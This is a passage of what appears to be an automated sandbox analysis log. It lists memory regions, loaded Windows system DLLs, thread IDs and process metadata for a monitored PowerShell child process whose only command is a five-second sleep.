(normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2937 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2938 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2939 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2940 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2941 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2942 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2943 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2944 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2945 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2946 start_va = 0x7ffb28a40000 end_va = 0x7ffb28a47fff monitored = 0 entry_point = 0x7ffb28a41ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2947 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2948 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3018 start_va = 0x5d0000 end_va = 0x5dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3263 start_va = 0x3c00000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 3264 start_va = 0x3c00000 end_va = 0x3cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 6456 start_va = 0x1200000 end_va = 0x12d9fff monitored = 0 entry_point = 0x1233c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Thread: id = 178 os_tid = 0xeec Thread: id = 179 os_tid = 0xd18 Thread: id = 180 os_tid = 0x6a0 Thread: id = 181 os_tid = 0x6c4 Thread: id = 182 os_tid = 0x554 Thread: id = 183 os_tid = 0xb18 Thread: id = 184 os_tid = 0xfe8 Thread: id = 185 os_tid = 0xfd8 Thread: id = 186 os_tid = 0xfcc Thread: id = 187 os_tid = 0xfa8 Thread: id = 188 os_tid = 0xe68 Thread: id = 189 os_tid = 0x4a0 Thread: id = 190 os_tid = 0x490 Thread: id = 191 os_tid = 0x45c Thread: id = 192 os_tid = 0x438 Thread: id = 193 os_tid = 0x428 Thread: id = 194 os_tid = 0x420 Thread: id = 195 os_tid = 0x268 Thread: id = 196 os_tid = 0x194 Thread: id = 197 os_tid = 0x190 Thread: id = 198 os_tid = 0x18c Thread: id = 199 os_tid = 0x124 Thread: id = 200 os_tid = 0x3f4 Thread: id = 201 os_tid = 0x380 Process: id = "11" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x333c2000" os_pid = "0x518" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x6d8" cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Sleep -s 5" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6479 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6480 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6481 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 6482 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 6483 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 6484 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 6485 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6486 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6487 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 6488 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 6489 start_va = 0x7ff6edf60000 end_va = 0x7ff6edfd7fff monitored = 0 entry_point = 0x7ff6edf631a0 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 6490 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6491 start_va = 0x520000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6492 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6493 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6494 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6495 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 6496 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6593 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6594 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6595 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6596 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6597 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6598 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6599 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6600 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6601 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6602 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6603 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6604 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6605 start_va = 0x7ffb116a0000 end_va = 0x7ffb116bdfff monitored = 0 entry_point = 0x7ffb116a3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 6606 start_va = 0x7ffb1c980000 end_va = 0x7ffb1c9e7fff monitored = 1 entry_point = 0x7ffb1c984970 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 6607 start_va = 0x620000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 6608 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6609 start_va = 0x480000 end_va = 0x4b8fff monitored = 0 entry_point = 0x4812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6610 start_va = 0x620000 end_va = 0x7a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 6611 start_va = 0x7d0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 6612 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6613 start_va = 0x7e0000 end_va = 0x960fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 6614 start_va = 0x970000 end_va = 0x1d6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 6615 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6616 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 6617 start_va = 0x1f0000 end_va = 0x1f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 6618 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 6619 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 6620 start_va = 0x1d70000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 6621 start_va = 0x4a0000 end_va = 0x4a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 6626 start_va = 0x7ffb187b0000 end_va = 0x7ffb18847fff monitored = 1 entry_point = 0x7ffb187b1000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 6627 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6628 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6629 start_va = 0x7ffb1a000000 end_va = 0x7ffb1a009fff monitored = 0 entry_point = 0x7ffb1a001350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 6630 start_va = 0x7ffb09400000 end_va = 0x7ffb09d8dfff monitored = 1 entry_point = 0x7ffb0952d9f0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 6631 start_va = 0x7ffb186b0000 end_va = 0x7ffb187a6fff monitored = 0 entry_point = 0x7ffb186d4d80 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\System32\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\system32\\msvcr120_clr0400.dll") Region: id = 6636 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 6637 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 6638 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 6639 start_va = 0x7ffaa9c80000 end_va = 0x7ffaa9c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9c80000" filename = "" Region: id = 6640 start_va = 0x7ffaa9c90000 end_va = 0x7ffaa9c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9c90000" filename = "" Region: id = 6641 start_va = 0x7ffaa9ca0000 end_va = 0x7ffaa9d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ca0000" filename = "" Region: id = 6642 start_va = 0x7ffaa9d30000 end_va = 0x7ffaa9d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9d30000" filename = "" Region: id = 6643 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 6644 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 6645 start_va = 0x1d70000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 6646 start_va = 0x1f30000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 6647 start_va = 0x1f40000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 6648 start_va = 0x1d70000 end_va = 0x1deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 6649 start_va = 0x1e70000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 6650 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 6651 start_va = 0x2100000 end_va = 0x1a0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 6652 start_va = 0x1df0000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 6653 start_va = 0x1f40000 end_va = 0x204afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 6654 start_va = 0x20f0000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 6655 start_va = 0x1e80000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6668 start_va = 0x1a100000 end_va = 0x1a436fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6669 start_va = 0x7ffb07f30000 end_va = 0x7ffb093f5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\e24742a3939bece9db8105d99720b0e0\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\e24742a3939bece9db8105d99720b0e0\\mscorlib.ni.dll") Region: id = 6670 start_va = 0x7df5ffe20000 end_va = 0x7df5ffebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007df5ffe20000" filename = "" Region: id = 6671 start_va = 0x7df5ffe10000 end_va = 0x7df5ffe1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007df5ffe10000" filename = "" Region: id = 6672 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 6673 start_va = 0x1a440000 end_va = 0x1a51cfff monitored = 0 entry_point = 0x1a49e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 6674 start_va = 0x1a440000 end_va = 0x1a56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a440000" filename = "" Region: id = 6675 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 6684 start_va = 0x7ffb07310000 end_va = 0x7ffb07f23fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cb0700ff6398b8e9d0d936cfc4894ba1\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system\\cb0700ff6398b8e9d0d936cfc4894ba1\\system.ni.dll") Region: id = 6687 start_va = 0x7ffb06980000 end_va = 0x7ffb07300fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\5290f26e6772518e2dd9d9c55bcc9a10\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.core\\5290f26e6772518e2dd9d9c55bcc9a10\\system.core.ni.dll") Region: id = 6690 start_va = 0x7ffb18160000 end_va = 0x7ffb1820bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pb378ec07#\\8cf70b5e577ba82747ca2b8794282fc0\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.pb378ec07#\\8cf70b5e577ba82747ca2b8794282fc0\\microsoft.powershell.consolehost.ni.dll") Region: id = 6691 start_va = 0x7ffb24aa0000 end_va = 0x7ffb24ab6fff monitored = 0 entry_point = 0x7ffb24aa79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 6692 start_va = 0x7ffb24730000 end_va = 0x7ffb24763fff monitored = 0 entry_point = 0x7ffb2474ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 6693 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6694 start_va = 0x7ffb24bc0000 end_va = 0x7ffb24bcafff monitored = 0 entry_point = 0x7ffb24bc19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 6699 start_va = 0x7ffaa9da0000 end_va = 0x7ffaa9ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9da0000" filename = "" Region: id = 6700 start_va = 0x7ffaa9de0000 end_va = 0x7ffaa9deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9de0000" filename = "" Region: id = 6709 start_va = 0x7ffb04970000 end_va = 0x7ffb06978fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\9d927f510e0c82ae9e818bc5d128b32d\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.manaa57fc8cc#\\9d927f510e0c82ae9e818bc5d128b32d\\system.management.automation.ni.dll") Region: id = 6738 start_va = 0x2050000 end_va = 0x20b1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscorrc.dll") Region: id = 6739 start_va = 0x7b0000 end_va = 0x7b4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 6740 start_va = 0x7c0000 end_va = 0x7cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 6741 start_va = 0x7ffb28a30000 end_va = 0x7ffb28a37fff monitored = 0 entry_point = 0x7ffb28a310b0 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 6750 start_va = 0x7ffaa9df0000 end_va = 0x7ffaa9dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9df0000" filename = "" Region: id = 6761 start_va = 0x7ffb1c890000 end_va = 0x7ffb1c8dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.numerics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Numerics\\d0872fa26aa1d9eb9f0ec8fc2e3b99ee\\System.Numerics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.numerics\\d0872fa26aa1d9eb9f0ec8fc2e3b99ee\\system.numerics.ni.dll") Region: id = 6771 start_va = 0x7ffb18610000 end_va = 0x7ffb186abfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.management.infrastructure.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Mf49f6405#\\953b834c8f9245b900628eed76db0400\\Microsoft.Management.Infrastructure.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.mf49f6405#\\953b834c8f9245b900628eed76db0400\\microsoft.management.infrastructure.ni.dll") Region: id = 6775 start_va = 0x7ffb040d0000 end_va = 0x7ffb04969fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\c0ce652aa04bc1fee99308a0a2ac79f8\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.xml\\c0ce652aa04bc1fee99308a0a2ac79f8\\system.xml.ni.dll") Region: id = 6776 start_va = 0x7ffb0e330000 end_va = 0x7ffb0e491fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Dired13b18a9#\\8357be8fc3a91df0478792b54d6b8798\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.dired13b18a9#\\8357be8fc3a91df0478792b54d6b8798\\system.directoryservices.ni.dll") Region: id = 6780 start_va = 0x7ffb0e1d0000 end_va = 0x7ffb0e32efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management\\fccecea4442e013d0d6a41b1bb69289b\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.management\\fccecea4442e013d0d6a41b1bb69289b\\system.management.ni.dll") Region: id = 6789 start_va = 0x7ffaa9e00000 end_va = 0x7ffaa9e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e00000" filename = "" Region: id = 6796 start_va = 0x7ffaa9e10000 end_va = 0x7ffaa9e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e10000" 